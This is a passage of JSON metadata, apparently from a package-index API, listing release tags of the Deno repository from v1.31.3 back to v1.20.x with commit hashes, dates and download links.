.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.